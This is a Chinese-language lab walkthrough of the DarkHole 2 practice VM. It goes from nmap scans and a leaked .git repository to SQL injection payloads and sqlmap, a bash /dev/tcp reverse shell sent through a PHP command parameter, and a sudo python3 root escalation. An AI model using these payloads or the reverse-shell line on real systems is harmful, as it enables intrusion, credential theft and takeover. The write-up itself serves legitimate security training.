信息收集

注：少见的一台可以使用 VMware Workstation 直接打开的靶机。

首先查看 Kali IP 地址：

root at kali in ~/darkhole2 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:be:8f:be brd ff:ff:ff:ff:ff:ff
    inet 10.10.8.21/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
       valid_lft 1138sec preferred_lft 1138sec
    inet6 fe80::ebaa:6e9f:e411:f446/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

地址探测

使用 Nmap 扫描出一个 IP：10.10.8.143

root at kali in ~/darkhole2 
$ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 22:55 CST
Nmap scan report for 10.10.8.1
Host is up (0.00011s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000077s latency).
MAC Address: 00:50:56:F2:17:CE (VMware)
Nmap scan report for 10.10.8.19
Host is up (0.00089s latency).
MAC Address: 00:0C:29:9C:BC:7C (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000037s latency).
MAC Address: 00:50:56:F0:C8:C4 (VMware)
Nmap scan report for 10.10.8.21
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.66 seconds

端口扫描

扫描开放端口：

root at kali in ~/darkhole2 
$ nmap -p- -sC -T4 --min-rate 10000 10.10.8.19 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 22:55 CST
Nmap scan report for 10.10.8.19
Host is up (0.000045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   3072 57:b1:f5:64:28:98:91:51:6d:70:76:6e:a5:52:43:5d (RSA)
|   256 cc:64:fd:7c:d8:5e:48:8a:28:98:91:b9:e4:1e:6d:a8 (ECDSA)
|_  256 9e:77:08:a4:52:9f:33:8d:96:19:ba:75:71:27:bd:60 (ED25519)
80/tcp open  http
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-git: 
|   10.10.8.19:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: i changed login.php file for more secure 
|_http-title: DarkHole V2
MAC Address: 00:0C:29:9C:BC:7C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds

服务识别

扫描端口对应服务：

root at kali in ~/darkhole2 
$ nmap -p22,80 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.19 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 22:56 CST
Nmap scan report for 10.10.8.19
Host is up (0.00053s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 57:b1:f5:64:28:98:91:51:6d:70:76:6e:a5:52:43:5d (RSA)
|   256 cc:64:fd:7c:d8:5e:48:8a:28:98:91:b9:e4:1e:6d:a8 (ECDSA)
|_  256 9e:77:08:a4:52:9f:33:8d:96:19:ba:75:71:27:bd:60 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-git: 
|   10.10.8.19:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: i changed login.php file for more secure 
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: DarkHole V2
MAC Address: 00:0C:29:9C:BC:7C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms 10.10.8.19

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.76 seconds

漏洞扫描

使用 Nmap 进行漏洞扫描：

root at kali in ~/darkhole2 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.19 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 22:56 CST
Nmap scan report for 10.10.8.19
Host is up (0.00044s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|       httponly flag not set
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
| http-git: 
|   10.10.8.19:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: i changed login.php file for more secure 
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.8.19
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.8.19:80/login.php
|     Form id: email
|_    Form action: 
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /login.php: Possible admin folder
|   /.git/HEAD: Git folder
|   /config/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_  /style/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
MAC Address: 00:0C:29:9C:BC:7C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 30.81 seconds

看了下扫出来的漏洞，没一个有用的。

目录扫描

root at kali in ~/darkhole2 
$ dirsearch -u http://10.10.8.19 -o $PWD/dirsearch.txt

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                 
 (_||| _) (/_(_|| (_| )                                                                                                                          
                                                                                                                                                 
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/darkhole2/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-23-12-03_22-57-49.log

Target: http://10.10.8.19/

[22:57:49] Starting: 
[22:57:49] 301 -  305B  - /js  ->  http://10.10.8.19/js/                   
[22:57:49] 200 -    3KB - /.git/                                           
[22:57:49] 301 -  307B  - /.git  ->  http://10.10.8.19/.git/
......

root at kali in ~/darkhole2 
$ cat dirsearch.txt | grep 200
200     3KB  http://10.10.8.19:80/.git/
200    73B   http://10.10.8.19:80/.git/description
200    41B   http://10.10.8.19:80/.git/COMMIT_EDITMSG
200    23B   http://10.10.8.19:80/.git/HEAD
200   130B   http://10.10.8.19:80/.git/config
200     4KB  http://10.10.8.19:80/.git/hooks/
200   945B   http://10.10.8.19:80/.git/info/
200     1KB  http://10.10.8.19:80/.git/index
200     1KB  http://10.10.8.19:80/.git/logs/
200   240B   http://10.10.8.19:80/.git/info/exclude
200   554B   http://10.10.8.19:80/.git/logs/HEAD
200   554B   http://10.10.8.19:80/.git/logs/refs/heads/master
200     6KB  http://10.10.8.19:80/.git/objects/
200     1KB  http://10.10.8.19:80/.git/refs/
200    41B   http://10.10.8.19:80/.git/refs/heads/master
200     1KB  http://10.10.8.19:80/.idea/
200   279B   http://10.10.8.19:80/.idea/modules.xml
200     2KB  http://10.10.8.19:80/.idea/workspace.xml
200   940B   http://10.10.8.19:80/config/
200    11B   http://10.10.8.19:80/dashboard.php
200   740B   http://10.10.8.19:80/index.php
200   740B   http://10.10.8.19:80/index.php/login/
200   928B   http://10.10.8.19:80/js/
200     1KB  http://10.10.8.19:80/login.php

漏洞利用

依次访问扫描出的内容，很明显这是一个自建的站点：

发现一个后台登录页面：

同时在也扫描有 .git 目录，感觉会出现源码泄露。

git 源码泄露

对于 git 源码泄露，常用的有两个工具进行下载：
- wget
- GitHack
这里用 wget 进行演示，使用如下命令下载 .git 目录内容：

root at kali in ~/darkhole2 
$ wget -r http://10.10.8.19/.git
--2023-12-03 23:06:14--  http://10.10.8.19/.git
Connecting to 10.10.8.19:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://10.10.8.19/.git/ [following]
--2023-12-03 23:06:14--  http://10.10.8.19/.git/
Reusing existing connection to 10.10.8.19:80.
HTTP request sent, awaiting response... 200 OK
Length: 2678 (2.6K) [text/html]
Saving to: ‘10.10.8.19/.git’

10.10.8.19/.git                      100%[===================================================================>]   2.62K  --.-KB/s    in 0s      

2023-12-03 23:06:14 (606 MB/s) - ‘10.10.8.19/.git’ saved [2678/2678]
......

root at kali in ~/darkhole2 
$ ls -al
total 32
drwxr-xr-x  3 root root 4096 Dec  3 23:06 .
drwx------ 23 root root 4096 Dec  3 23:06 ..
drwxr-xr-x  5 root root 4096 Dec  3 23:06 10.10.8.19
-rw-r--r--  1 root root 3067 Dec  3 22:58 dirsearch.txt
-rw-r--r--  1 root root  665 Dec  3 22:55 nmap_ip.txt
-rw-r--r--  1 root root  955 Dec  3 22:55 nmap_port.txt
-rw-r--r--  1 root root 1565 Dec  3 22:56 nmap_server.txt
-rw-r--r--  1 root root 1557 Dec  3 22:56 nmap_vuln.txt

root at kali in ~/darkhole2/10.10.8.19 (master●●) 
$ git log > git_log.txt

root at kali in ~/darkhole2/10.10.8.19 (master●●) 
$ cat git_log.txt             
commit 0f1d821f48a9cf662f285457a5ce9af6b9feb2c4
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:14:32 2021 +0300

    i changed login.php file for more secure

commit a4d900a8d85e8938d3601f3cef113ee293028e10
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:06:20 2021 +0300

    I added login.php file with default credentials

commit aa2a5f3aa15bb402f2b90a07d86af57436d64917
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:02:44 2021 +0300

    First Initialize

发现文件经历了两次修改，其中第一次修改后的 commit 提示了新增 login.php 默认凭证，有搞头。
使用 git 命令查看修改文件内容：

root at kali in ~/darkhole2/10.10.8.19 (master●●) 
$ git diff a4d900a8d85e8938d3601f3cef113ee293028e10 > git_change.txt

root at kali in ~/darkhole2/10.10.8.19 (master●●) 
$ cat git_change.txt
......
diff --git a/login.php b/login.php
index 8a0ff67..6545962 100644
--- a/login.php
+++ b/login.php
@@ -1,42 +1,30 @@
-<?php
-session_start();
-require 'config/config.php';
-if($_SERVER['REQUEST_METHOD'] == 'POST'){
-    if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
-        $_SESSION['userid'] = 1;
-        header("location:dashboard.php");
-        die();
-    }
-
-}
-?>
......

发现了华点，这里出现了邮箱和密码：lush@admin.com/321。
正好后台登录需要的就是邮箱和密码，尝试登录一下。

SQL 注入

成功登录到后台：

左看看，右挖挖，没有什么功能点。
不过在 URL 处发现了一个参数提交：?id=1，这里很有可能存在两类漏洞
- 水平/垂直越权
- SQL 注入
但试了几个参数值，都没啥变化，越权应该是没有了。
试试 SQL 注入：

输入单引号页面直接白屏了，有戏，尝试闭合：

可以那就是存在 SQL 注入了，现在有两种方式：
- 手工注入
- SQLMap

手工注入

那就先来遍手工注入，老生常谈了：

# 判断列数
?id=1' order by 1 --+ # 页面正常返回数据
?id=1' order by 2 --+ # 页面正常返回数据
?id=1' order by 3 --+ # 页面正常返回数据
?id=1' order by 4 --+ # 页面正常返回数据
?id=1' order by 5 --+ # 页面正常返回数据
?id=1' order by 6 --+ # 页面正常返回数据
?id=1' order by 7 --+ # 页面无返回数据

# 判断回显
?id=-1' union select 1,2,3,4,5,6 --+ # 2,3,5,6 有回显

# 查询当前数据库
?id=-1' union select 1,2,3,4,5,database() --+ # darkhole_2

# 查询所有数据库
?id=-1' union select 1,2,3,4,5,group_concat(schema_name) from information_schema.schemata --+ # mysql,information_schema,performance_schema,sys,darkhole_2

# 判断 darkhole_2 库中的表名
?id=-1' union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema = 'darkhole_2' --+ # ssh,users

# 判断 ssh 表中的列名
?id=-1' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_schema = 'darkhole_2' and table_name = 'ssh' --+ # id,user,pass

# 查询 ssh 表中的数据
?id=-1' union select 1,2,3,4,5,group_concat(id,'-',user,'-',pass) from ssh --+ # 1-jehad-fool

# 判断 users 表中的列名
?id=-1' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_schema = 'darkhole_2' and table_name = 'users' --+ # id,username,email,password,contact_number,address

# 查询 ssh 表中的数据
?id=-1' union select 1,2,3,4,5,group_concat(id,'-',username,'-',email,'-',password) from users --+ # 1-Jehad Alqurashiasddasdasdas-lush@admin.com-321

SQLMap

由于是登录后的页面，需要使用 BurpSuite 保存一个 HTTP 请求包，名为 url.txt：

直接 SQLMap 一把梭：

root at kali in ~/darkhole2 
$ sqlmap -r url.txt --batch -v 0 -D darkhole_2 --dump
......
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 3953 FROM (SELECT(SLEEP(5)))dKlu) AND 'dcmE'='dcmE

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=-8382' UNION ALL SELECT NULL,CONCAT(0x7176627071,0x775673597243587276705367565a5368437a4f774b7256745145427a6642704b5854524c79786165,0x7178707a71),NULL,NULL,NULL,NULL-- -
---
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
Database: darkhole_2
Table: ssh
[1 entry]
+----+------+--------+
| id | pass | user   |
+----+------+--------+
| 1  | fool | jehad  |
+----+------+--------+

Database: darkhole_2
Table: users
[1 entry]
+----+----------------+-------------------------------------------+----------+-----------------------------+----------------+
| id | email          | address                                   | password | username                    | contact_number |
+----+----------------+-------------------------------------------+----------+-----------------------------+----------------+
| 1  | lush@admin.com |  Street, Pincode, Province/State, Country | 321      | Jehad Alqurashiasddasdasdas | 1              |
+----+----------------+-------------------------------------------+----------+-----------------------------+----------------+


[*] ending @ 23:47:06 /2023-12-03/

当然也可以使用这个命令：

1	sqlmap -u 'http://10.10.8.19/dashboard.php?id=1' --batch -v 0 --cookie 'PHPSESSID=7lthum22ic3hqcfuk9auppj6es' -D darkhole_2 --dump

信息收集

已经有了非常明显的提示，使用爆破出来的 SSH 账号密码进行连接：

root at kali in ~/darkhole2 
$ ssh jehad@10.10.8.19
jehad@10.10.8.19's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-81-generic x86_64)
......
Last login: Fri Sep  3 05:49:05 2021 from 192.168.135.128
jehad@darkhole:~$ id
uid=1001(jehad) gid=1001(jehad) groups=1001(jehad)

但并不是 root 权限，之前都是手工探测漏洞和系统信息，现在使用脚本工具吧，不然也蛮累的。
下载 linux-smart-enumeration 脚本工具：

1	wget https://github.com/diego-treitos/linux-smart-enumeration/releases/download/4.13nw/lse.sh

本地使用 Python 开启 Web 服务：

1
2
3

root at kali in ~/darkhole2 
$ python -m http.server 80                                                                                 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

在靶机上进行文件下载：

jehad@darkhole:~$ wget http://10.10.8.21/lse.sh
--2023-12-03 16:42:39--  http://10.10.8.21/lse.sh
Connecting to 10.10.8.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 54352 (53K) [text/x-sh]
Saving to: ‘lse.sh’

lse.sh                               100%[===================================================================>]  53.08K  --.-KB/s    in 0s      

2023-12-03 16:42:39 (340 MB/s) - ‘lse.sh’ saved [54352/54352]

赋权并执行：

jehad@darkhole:~$ chmod +x lse.sh ; ./lse.sh
---
If you know the current user password, write it here to check sudo privileges: fool
---
 LSE Version: 4.13nw

        User: jehad
     User ID: 1001
    Password: ******
        Home: /home/jehad
        Path: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
       umask: 0002

    Hostname: darkhole
       Linux: 5.4.0-81-generic
......
========================================================( recurrent tasks )=====
[*] ret000 User crontab.................................................... nope
[!] ret010 Cron tasks writable by user..................................... nope
[*] ret020 Cron jobs....................................................... yes!
[*] ret030 Can we read user crontabs....................................... nope
[*] ret040 Can we list other user cron tasks?.............................. nope
[*] ret050 Can we write to any paths present in cron jobs.................. yes!
[!] ret060 Can we write to executable paths present in cron jobs........... yes!
---
/etc/crontab:* * * * * losy  cd /opt/web && php -S localhost:9999
---
[i] ret400 Cron files...................................................... skip
[*] ret500 User systemd timers............................................. nope
[!] ret510 Can we write in any system timer?............................... nope
[i] ret900 Systemd timers.................................................. skip
......

发现了一个重要的信息，在 /etc/crontab 文件中有一个计划任务，看样子是开启一个 Web 服务。

本地文件 Shell 反弹

1
2
3

jehad@darkhole:~$ cd /opt/web
jehad@darkhole:/opt/web$ ls
index.php

发现一个 index.php 文件，有搞头，查看内容：

ehad@darkhole:/opt/web$ cat index.php 
<?php
    echo "Parameter GET['cmd']";
    if(isset($_GET['cmd'])){
    echo system($_GET['cmd']);
    }
?>

看样子有了，查看当前端口开放情况：

jehad@darkhole:/opt/web$ netstat -antlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:9999          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 10.10.8.19:22           10.10.8.21:33122        ESTABLISHED -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -

9999 端口确实开放着，但由于限制在了本地访问，所以可以使用 curl 构造请求：

1 2	jehad@darkhole:/opt/web$ curl 'http://127.0.0.1:9999/?cmd=id' Parameter GET['cmd']uid=1002(losy) gid=1002(losy) groups=1002(losy)

发现确实可以执行，ok，反弹一个 Shell 出来。
在 Kali 上开启监听：

1
2
3

root at kali in ~/darkhole2 
$ nc -lvvp 4444                                                       
listening on [any] 4444 ...

在靶机上构造 Bash 反弹语句：

1 2	# bash -c 'bash -i &> /dev/tcp/10.10.8.21/4444 0>&1' curl "http://127.0.0.1:9999/?cmd=bash%20-c%20%27bash%20-i%20%26%3E%20%2Fdev%2Ftcp%2F10.10.8.21%2F4444%200%3E%261%27"

成功反弹：

root at kali in ~/darkhole2 
$ nc -lvvp 4444                                                       
listening on [any] 4444 ...
10.10.8.19: inverse host lookup failed: Unknown host
connect to [10.10.8.21] from (UNKNO  WN) [10.10.8.19] 44852
bash: cannot set terminal process group (1257): Inappropriate ioctl for device
bash: no job control in this shell
losy@darkhole:/opt/web$ id
id
uid=1002(losy) gid=1002(losy) groups=1002(losy)

user.txt

在 losy 用户目录下发现了 flag：

1
2
3

losy@darkhole:~$ cat user.txt
cat user.txt
DarkHole{'This_is_the_life_man_better_than_a_cruise'}

二次信息收集

由于之前的信息收集脚本在 jehad 的家目录，现在切换目录进不去了，低级失误，所以要重新传一遍 lse 文件：

losy@darkhole:~$ wget http://10.10.8.21/lse.sh
wget http://10.10.8.21/lse.sh
--2023-12-03 17:07:44--  http://10.10.8.21/lse.sh
Connecting to 10.10.8.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 54352 (53K) [text/x-sh]
Saving to: ‘lse.sh’

     0K .......... .......... .......... .......... .......... 94%  335M 0s
    50K ...                                                   100% 5871G=0s

2023-12-03 17:07:44 (356 MB/s) - ‘lse.sh’ saved [54352/54352]

losy@darkhole:~$ chmod +x lse.sh ; ./lse.sh
chmod +x lse.sh ; ./lse.sh
---
If you know the current user password, write it here to check sudo privileges:
---

 LSE Version: 4.13nw

        User: losy
     User ID: 1002
    Password: none
......
[!] fst200 Are there possible credentials in any shell history file?....... yes!
---
password:gang 
---
[!] fst210 Are there NFS exports with 'no_root_squash' option?............. nope
......

在 losy 历史记录中发现了 password：gang，SSH 尝试登录一下：

root at kali in ~/darkhole2 
$ ssh losy@10.10.8.19 
losy@10.10.8.19's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-81-generic x86_64)
......
Last login: Fri Sep  3 04:09:48 2021 from 192.168.135.128
losy@darkhole:~$ id
uid=1002(losy) gid=1002(losy) groups=1002(losy)

SUDO/Python 提权

之前对这个用户信息收集过了，所以还剩两条路：
- SUDO 提权
- 内核提权
至于为什么是 SUID，因为刚才跑脚本时没有输入密码，无法判断是否具有 SUDO 权限。
现在判断一下：

losy@darkhole:~$ sudo -l
[sudo] password for losy: 
Matching Defaults entries for losy on darkhole:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User losy may run the following commands on darkhole:
    (root) /usr/bin/python3

发现 Python3 具有 root 执行权限，那就简单了：

1
2
3

losy@darkhole:~$ sudo /usr/bin/python3 -c "import pty;pty.spawn('/bin/bash')"
root@darkhole:/home/losy# id
uid=0(root) gid=0(root) groups=0(root)

提权成功！

root.txt

root@darkhole:/home/losy# cd /root
root@darkhole:~# ls
root.txt  snap
root@darkhole:~# cat root.txt
DarkHole{'Legend'}